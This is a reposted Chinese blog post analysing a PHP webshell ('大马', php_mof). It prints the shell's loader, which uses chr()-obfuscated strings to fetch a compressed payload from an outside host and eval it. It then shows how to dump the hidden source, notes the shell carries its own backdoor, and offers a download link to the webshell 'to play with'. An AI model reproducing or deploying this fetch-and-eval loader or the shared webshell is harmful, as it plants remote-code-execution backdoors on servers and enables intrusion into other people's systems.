分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > IT知识

分析 PHP大马-php_mof SHELL

发布时间:2023-09-06 02:01责任编辑:沈小雨关键词:PHP

Part 1 前言

  https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。

<?php$password = ‘phpinfo‘;//登录密码//----------功能程序------------------//$c = "chr";session_start();if (empty($_SESSION[‘PhpCode‘])) { ???$url = $c(104).$c(116).$c(116).$c(112).$c(58); ???$url .= $c(47).$c(47).$c(119).$c(119).$c(119); ???$url .= $c(46).$c(112).$c(104).$c(112).$c(115); ???$url .= $c(101).$c(99).$c(46).$c(99).$c(99); ???$url .= $c(47).$c(72).$c(97).$c(99).$c(107); ???$url .= $c(47).$c(52).$c(48).$c(52).$c(46).$c(103).$c(105).$c(102); ???$get = $c(102) . $c(105) . $c(108) . $c(101) . $c(95); ???$get .= $c(103) . $c(101) . $c(116) . $c(95) . $c(99); ???$get .= $c(111) . $c(110) . $c(116) . $c(101) . $c(110); ???$get .= $c(116) . $c(115); ???$_SESSION[‘PhpCode‘] = $get($url);}$unzip = $c(103) . $c(122) . $c(105) . $c(110);$unzip .= $c(102) . $c(108) . $c(97) . $c(116) . $c(101);@eval($unzip($_SESSION[‘PhpCode‘]));?>

Part 2 分析

第22行这里eval修改成exit,修改后,运行代码。

@exit($unzip($_SESSION[‘PhpCode‘]));

复制代码。

修改代码,如图.

运行代码,右键查看源代码,代码出来了。

Part 3 后门

  常在河边走,那有不湿鞋。

小插曲

Part 4 后记

  分享,大马源码,喜欢的自己玩玩。

链接:https://pan.baidu.com/s/1lqbglb1onPFiwRVbPQRNAw 密码:q2yy

分析 PHP大马-php_mof SHELL

原文地址:https://www.cnblogs.com/s0mf/p/9216947.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved